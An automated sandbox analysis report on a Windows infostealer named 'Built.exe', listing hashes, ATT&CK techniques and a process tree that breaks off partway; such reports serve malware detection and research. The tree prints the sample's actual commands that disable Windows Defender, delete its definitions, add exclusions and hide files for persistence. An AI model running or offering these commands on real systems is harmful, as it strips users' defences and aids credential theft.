1ffc168f780ed5afc618a2909f565d0ec9f7a588f8a15e98bb75d71904329d61

Analysis

max time kernel
93s
max time network
100s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
21-12-2024 03:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

7.6MB
MD5

dd7e819e30addd058d9982a682803978
SHA1

d34e0b0f4bc8a8a60f0c1c33279040e4a1ba5cec
SHA256

1ffc168f780ed5afc618a2909f565d0ec9f7a588f8a15e98bb75d71904329d61
SHA512

f26ef45c1164227d28e2bc6f81db617d385c31f1627542f497d923bbbdbc3df05955f8fe12c7e552ffd5f631d2c79f75b07f4102228a2994431917599bc587d8
SSDEEP

196608:5XD+kdFJwfI9jUCBB7m+mKOY7rXrZusoSDmhfvsbnTNeWW:952IHL7HmBYXrYSaUNc

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 2 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
3984	MpCmdRun.exe
3832	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6080	powershell.exe
1056	powershell.exe
2388	powershell.exe
4896	powershell.exe
384	powershell.exe
6084	powershell.exe
5928	powershell.exe
3200	powershell.exe
2112	powershell.exe
4724	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4720	cmd.exe
552	powershell.exe
1940	cmd.exe
2172	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
2204	rar.exe
5456	Built.exe
4836	Built.exe
4920	rar.exe

Loads dropped DLL 32 IoCs

pid	Process
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
1376	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe
4836	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com
22	ip-api.com
155	ip-api.com
161	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 10 IoCs

discovery

Process Discovery

T1057

pid	Process
1968	tasklist.exe
1952	tasklist.exe
4452	tasklist.exe
3504	tasklist.exe
5928	tasklist.exe
932	tasklist.exe
5712	tasklist.exe
5576	tasklist.exe
5252	tasklist.exe
3512	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3932	cmd.exe
1884	cmd.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000046181-21.dat	upx
behavioral1/memory/1376-25-0x00007FFD29900000-0x00007FFD29F65000-memory.dmp	upx
behavioral1/files/0x0028000000046174-27.dat	upx
behavioral1/memory/1376-30-0x00007FFD3C820000-0x00007FFD3C847000-memory.dmp	upx
behavioral1/files/0x002800000004617f-29.dat	upx
behavioral1/memory/1376-32-0x00007FFD42790000-0x00007FFD4279F000-memory.dmp	upx
behavioral1/files/0x0028000000046180-35.dat	upx
behavioral1/files/0x002800000004617e-34.dat	upx
behavioral1/files/0x002800000004617b-48.dat	upx
behavioral1/files/0x002800000004617a-47.dat	upx
behavioral1/files/0x0028000000046179-46.dat	upx
behavioral1/files/0x0028000000046178-45.dat	upx
behavioral1/files/0x0028000000046177-44.dat	upx
behavioral1/files/0x0028000000046176-43.dat	upx
behavioral1/files/0x0028000000046175-42.dat	upx
behavioral1/files/0x0028000000046173-41.dat	upx
behavioral1/files/0x0028000000046186-40.dat	upx
behavioral1/files/0x0028000000046185-39.dat	upx
behavioral1/files/0x0028000000046184-38.dat	upx
behavioral1/memory/1376-54-0x00007FFD38D00000-0x00007FFD38D2B000-memory.dmp	upx
behavioral1/memory/1376-56-0x00007FFD3F8C0000-0x00007FFD3F8D9000-memory.dmp	upx
behavioral1/memory/1376-58-0x00007FFD38A60000-0x00007FFD38A85000-memory.dmp	upx
behavioral1/memory/1376-60-0x00007FFD29780000-0x00007FFD298FF000-memory.dmp	upx
behavioral1/memory/1376-62-0x00007FFD3D880000-0x00007FFD3D899000-memory.dmp	upx
behavioral1/memory/1376-64-0x00007FFD42200000-0x00007FFD4220D000-memory.dmp	upx
behavioral1/memory/1376-66-0x00007FFD38760000-0x00007FFD38793000-memory.dmp	upx
behavioral1/memory/1376-71-0x00007FFD37CD0000-0x00007FFD37D9E000-memory.dmp	upx
behavioral1/memory/1376-70-0x00007FFD29900000-0x00007FFD29F65000-memory.dmp	upx
behavioral1/memory/1376-74-0x00007FFD3C820000-0x00007FFD3C847000-memory.dmp	upx
behavioral1/memory/1376-72-0x00007FFD29240000-0x00007FFD29773000-memory.dmp	upx
behavioral1/memory/1376-76-0x00007FFD42790000-0x00007FFD4279F000-memory.dmp	upx
behavioral1/memory/1376-79-0x00007FFD38D00000-0x00007FFD38D2B000-memory.dmp	upx
behavioral1/memory/1376-82-0x00007FFD3F8C0000-0x00007FFD3F8D9000-memory.dmp	upx
behavioral1/memory/1376-83-0x00007FFD29180000-0x00007FFD29233000-memory.dmp	upx
behavioral1/memory/1376-80-0x00007FFD3D4E0000-0x00007FFD3D4ED000-memory.dmp	upx
behavioral1/memory/1376-77-0x00007FFD34990000-0x00007FFD349A4000-memory.dmp	upx
behavioral1/memory/1376-84-0x00007FFD38A60000-0x00007FFD38A85000-memory.dmp	upx
behavioral1/memory/1376-86-0x00007FFD29780000-0x00007FFD298FF000-memory.dmp	upx
behavioral1/memory/1376-118-0x00007FFD38760000-0x00007FFD38793000-memory.dmp	upx
behavioral1/memory/1376-203-0x00007FFD37CD0000-0x00007FFD37D9E000-memory.dmp	upx
behavioral1/memory/1376-204-0x00007FFD29240000-0x00007FFD29773000-memory.dmp	upx
behavioral1/memory/1376-307-0x00007FFD29180000-0x00007FFD29233000-memory.dmp	upx
behavioral1/memory/1376-314-0x00007FFD29780000-0x00007FFD298FF000-memory.dmp	upx
behavioral1/memory/1376-319-0x00007FFD29240000-0x00007FFD29773000-memory.dmp	upx
behavioral1/memory/1376-317-0x00007FFD38760000-0x00007FFD38793000-memory.dmp	upx
behavioral1/memory/1376-308-0x00007FFD29900000-0x00007FFD29F65000-memory.dmp	upx
behavioral1/memory/1376-343-0x00007FFD29900000-0x00007FFD29F65000-memory.dmp	upx
behavioral1/memory/1376-372-0x00007FFD29180000-0x00007FFD29233000-memory.dmp	upx
behavioral1/memory/1376-382-0x00007FFD37CD0000-0x00007FFD37D9E000-memory.dmp	upx
behavioral1/memory/1376-383-0x00007FFD29240000-0x00007FFD29773000-memory.dmp	upx
behavioral1/memory/1376-381-0x00007FFD38760000-0x00007FFD38793000-memory.dmp	upx
behavioral1/memory/1376-380-0x00007FFD42200000-0x00007FFD4220D000-memory.dmp	upx
behavioral1/memory/1376-379-0x00007FFD3D880000-0x00007FFD3D899000-memory.dmp	upx
behavioral1/memory/1376-378-0x00007FFD29780000-0x00007FFD298FF000-memory.dmp	upx
behavioral1/memory/1376-377-0x00007FFD38A60000-0x00007FFD38A85000-memory.dmp	upx
behavioral1/memory/1376-376-0x00007FFD3F8C0000-0x00007FFD3F8D9000-memory.dmp	upx
behavioral1/memory/1376-375-0x00007FFD38D00000-0x00007FFD38D2B000-memory.dmp	upx
behavioral1/memory/1376-374-0x00007FFD42790000-0x00007FFD4279F000-memory.dmp	upx
behavioral1/memory/1376-373-0x00007FFD3C820000-0x00007FFD3C847000-memory.dmp	upx
behavioral1/memory/1376-371-0x00007FFD3D4E0000-0x00007FFD3D4ED000-memory.dmp	upx
behavioral1/memory/1376-370-0x00007FFD34990000-0x00007FFD349A4000-memory.dmp	upx
behavioral1/memory/1376-358-0x00007FFD29900000-0x00007FFD29F65000-memory.dmp	upx
behavioral1/memory/4836-926-0x00007FFD27B10000-0x00007FFD28175000-memory.dmp	upx
behavioral1/memory/4836-927-0x00007FFD3C890000-0x00007FFD3C8B7000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\Built.exe:Zone.Identifier	firefox.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1764	cmd.exe
4280	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2004	cmd.exe
5232	netsh.exe
1472	netsh.exe
3588	cmd.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Detects videocard installed 1 TTPs 6 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
672	WMIC.exe
4996	WMIC.exe
2556	WMIC.exe
4040	WMIC.exe
6128	WMIC.exe
3256	WMIC.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5320	systeminfo.exe
6096	systeminfo.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
3584	taskkill.exe
2864	taskkill.exe
4580	taskkill.exe
5836	taskkill.exe
3928	taskkill.exe
1672	taskkill.exe
5012	taskkill.exe
5048	taskkill.exe
60	taskkill.exe
2328	taskkill.exe
5264	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\Built.exe:Zone.Identifier	firefox.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4280	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4896	powershell.exe
5928	powershell.exe
5132	WMIC.exe
5132	WMIC.exe
5132	WMIC.exe
5132	WMIC.exe
4896	powershell.exe
5928	powershell.exe
6128	WMIC.exe
6128	WMIC.exe
6128	WMIC.exe
6128	WMIC.exe
3256	WMIC.exe
3256	WMIC.exe
3256	WMIC.exe
3256	WMIC.exe
3200	powershell.exe
3200	powershell.exe
5444	WMIC.exe
5444	WMIC.exe
5444	WMIC.exe
5444	WMIC.exe
860	powershell.exe
860	powershell.exe
552	powershell.exe
552	powershell.exe
860	powershell.exe
552	powershell.exe
384	powershell.exe
384	powershell.exe
4920	powershell.exe
4920	powershell.exe
2408	WMIC.exe
2408	WMIC.exe
2408	WMIC.exe
2408	WMIC.exe
4860	WMIC.exe
4860	WMIC.exe
4860	WMIC.exe
4860	WMIC.exe
3336	WMIC.exe
3336	WMIC.exe
3336	WMIC.exe
3336	WMIC.exe
6084	powershell.exe
6084	powershell.exe
672	WMIC.exe
672	WMIC.exe
672	WMIC.exe
672	WMIC.exe
1584	powershell.exe
1584	powershell.exe
6080	powershell.exe
6080	powershell.exe
2112	powershell.exe
2112	powershell.exe
1672	WMIC.exe
1672	WMIC.exe
1672	WMIC.exe
1672	WMIC.exe
6080	powershell.exe
2112	powershell.exe
4996	WMIC.exe
4996	WMIC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1968	tasklist.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	5928	powershell.exe
Token: SeIncreaseQuotaPrivilege	5132	WMIC.exe
Token: SeSecurityPrivilege	5132	WMIC.exe
Token: SeTakeOwnershipPrivilege	5132	WMIC.exe
Token: SeLoadDriverPrivilege	5132	WMIC.exe
Token: SeSystemProfilePrivilege	5132	WMIC.exe
Token: SeSystemtimePrivilege	5132	WMIC.exe
Token: SeProfSingleProcessPrivilege	5132	WMIC.exe
Token: SeIncBasePriorityPrivilege	5132	WMIC.exe
Token: SeCreatePagefilePrivilege	5132	WMIC.exe
Token: SeBackupPrivilege	5132	WMIC.exe
Token: SeRestorePrivilege	5132	WMIC.exe
Token: SeShutdownPrivilege	5132	WMIC.exe
Token: SeDebugPrivilege	5132	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5132	WMIC.exe
Token: SeRemoteShutdownPrivilege	5132	WMIC.exe
Token: SeUndockPrivilege	5132	WMIC.exe
Token: SeManageVolumePrivilege	5132	WMIC.exe
Token: 33	5132	WMIC.exe
Token: 34	5132	WMIC.exe
Token: 35	5132	WMIC.exe
Token: 36	5132	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5132	WMIC.exe
Token: SeSecurityPrivilege	5132	WMIC.exe
Token: SeTakeOwnershipPrivilege	5132	WMIC.exe
Token: SeLoadDriverPrivilege	5132	WMIC.exe
Token: SeSystemProfilePrivilege	5132	WMIC.exe
Token: SeSystemtimePrivilege	5132	WMIC.exe
Token: SeProfSingleProcessPrivilege	5132	WMIC.exe
Token: SeIncBasePriorityPrivilege	5132	WMIC.exe
Token: SeCreatePagefilePrivilege	5132	WMIC.exe
Token: SeBackupPrivilege	5132	WMIC.exe
Token: SeRestorePrivilege	5132	WMIC.exe
Token: SeShutdownPrivilege	5132	WMIC.exe
Token: SeDebugPrivilege	5132	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5132	WMIC.exe
Token: SeRemoteShutdownPrivilege	5132	WMIC.exe
Token: SeUndockPrivilege	5132	WMIC.exe
Token: SeManageVolumePrivilege	5132	WMIC.exe
Token: 33	5132	WMIC.exe
Token: 34	5132	WMIC.exe
Token: 35	5132	WMIC.exe
Token: 36	5132	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5928	powershell.exe
Token: SeSecurityPrivilege	5928	powershell.exe
Token: SeTakeOwnershipPrivilege	5928	powershell.exe
Token: SeLoadDriverPrivilege	5928	powershell.exe
Token: SeSystemProfilePrivilege	5928	powershell.exe
Token: SeSystemtimePrivilege	5928	powershell.exe
Token: SeProfSingleProcessPrivilege	5928	powershell.exe
Token: SeIncBasePriorityPrivilege	5928	powershell.exe
Token: SeCreatePagefilePrivilege	5928	powershell.exe
Token: SeBackupPrivilege	5928	powershell.exe
Token: SeRestorePrivilege	5928	powershell.exe
Token: SeShutdownPrivilege	5928	powershell.exe
Token: SeDebugPrivilege	5928	powershell.exe
Token: SeSystemEnvironmentPrivilege	5928	powershell.exe
Token: SeRemoteShutdownPrivilege	5928	powershell.exe
Token: SeUndockPrivilege	5928	powershell.exe
Token: SeManageVolumePrivilege	5928	powershell.exe
Token: 33	5928	powershell.exe
Token: 34	5928	powershell.exe

Suspicious use of FindShellTrayWindow 22 IoCs

pid	Process
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe
4352	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 6024 wrote to memory of 1376	6024	Built.exe	82
PID 6024 wrote to memory of 1376	6024	Built.exe	82
PID 1376 wrote to memory of 464	1376	Built.exe	84
PID 1376 wrote to memory of 464	1376	Built.exe	84
PID 1376 wrote to memory of 3608	1376	Built.exe	85
PID 1376 wrote to memory of 3608	1376	Built.exe	85
PID 1376 wrote to memory of 4516	1376	Built.exe	87
PID 1376 wrote to memory of 4516	1376	Built.exe	87
PID 3608 wrote to memory of 4896	3608	cmd.exe	90
PID 3608 wrote to memory of 4896	3608	cmd.exe	90
PID 1376 wrote to memory of 2572	1376	Built.exe	91
PID 1376 wrote to memory of 2572	1376	Built.exe	91
PID 4516 wrote to memory of 1968	4516	cmd.exe	93
PID 4516 wrote to memory of 1968	4516	cmd.exe	93
PID 464 wrote to memory of 5928	464	cmd.exe	94
PID 464 wrote to memory of 5928	464	cmd.exe	94
PID 2572 wrote to memory of 5132	2572	cmd.exe	95
PID 2572 wrote to memory of 5132	2572	cmd.exe	95
PID 1376 wrote to memory of 1892	1376	Built.exe	99
PID 1376 wrote to memory of 1892	1376	Built.exe	99
PID 1892 wrote to memory of 1628	1892	cmd.exe	167
PID 1892 wrote to memory of 1628	1892	cmd.exe	167
PID 1376 wrote to memory of 1644	1376	Built.exe	102
PID 1376 wrote to memory of 1644	1376	Built.exe	102
PID 1644 wrote to memory of 392	1644	cmd.exe	104
PID 1644 wrote to memory of 392	1644	cmd.exe	104
PID 1376 wrote to memory of 4280	1376	Built.exe	105
PID 1376 wrote to memory of 4280	1376	Built.exe	105
PID 4280 wrote to memory of 6128	4280	cmd.exe	107
PID 4280 wrote to memory of 6128	4280	cmd.exe	107
PID 1376 wrote to memory of 384	1376	Built.exe	176
PID 1376 wrote to memory of 384	1376	Built.exe	176
PID 3608 wrote to memory of 3984	3608	cmd.exe	108
PID 3608 wrote to memory of 3984	3608	cmd.exe	108
PID 384 wrote to memory of 3256	384	cmd.exe	111
PID 384 wrote to memory of 3256	384	cmd.exe	111
PID 1376 wrote to memory of 3932	1376	Built.exe	112
PID 1376 wrote to memory of 3932	1376	Built.exe	112
PID 1376 wrote to memory of 5524	1376	Built.exe	113
PID 1376 wrote to memory of 5524	1376	Built.exe	113
PID 5524 wrote to memory of 3200	5524	cmd.exe	116
PID 5524 wrote to memory of 3200	5524	cmd.exe	116
PID 3932 wrote to memory of 2196	3932	cmd.exe	117
PID 3932 wrote to memory of 2196	3932	cmd.exe	117
PID 1376 wrote to memory of 4964	1376	Built.exe	118
PID 1376 wrote to memory of 4964	1376	Built.exe	118
PID 1376 wrote to memory of 1196	1376	Built.exe	119
PID 1376 wrote to memory of 1196	1376	Built.exe	119
PID 4964 wrote to memory of 932	4964	cmd.exe	122
PID 4964 wrote to memory of 932	4964	cmd.exe	122
PID 1196 wrote to memory of 1952	1196	cmd.exe	123
PID 1196 wrote to memory of 1952	1196	cmd.exe	123
PID 1376 wrote to memory of 6120	1376	Built.exe	124
PID 1376 wrote to memory of 6120	1376	Built.exe	124
PID 1376 wrote to memory of 4720	1376	Built.exe	125
PID 1376 wrote to memory of 4720	1376	Built.exe	125
PID 1376 wrote to memory of 4984	1376	Built.exe	127
PID 1376 wrote to memory of 4984	1376	Built.exe	127
PID 1376 wrote to memory of 3816	1376	Built.exe	128
PID 1376 wrote to memory of 3816	1376	Built.exe	128
PID 1376 wrote to memory of 2004	1376	Built.exe	129
PID 1376 wrote to memory of 2004	1376	Built.exe	129
PID 1376 wrote to memory of 3664	1376	Built.exe	130
PID 1376 wrote to memory of 3664	1376	Built.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1976	attrib.exe
3252	attrib.exe
5936	attrib.exe
2196	attrib.exe
3824	attrib.exe
3440	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:6024
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4896
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:3984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4516
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1892
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1644
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3932
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:932
- - C:\Windows\system32\cmd.exe
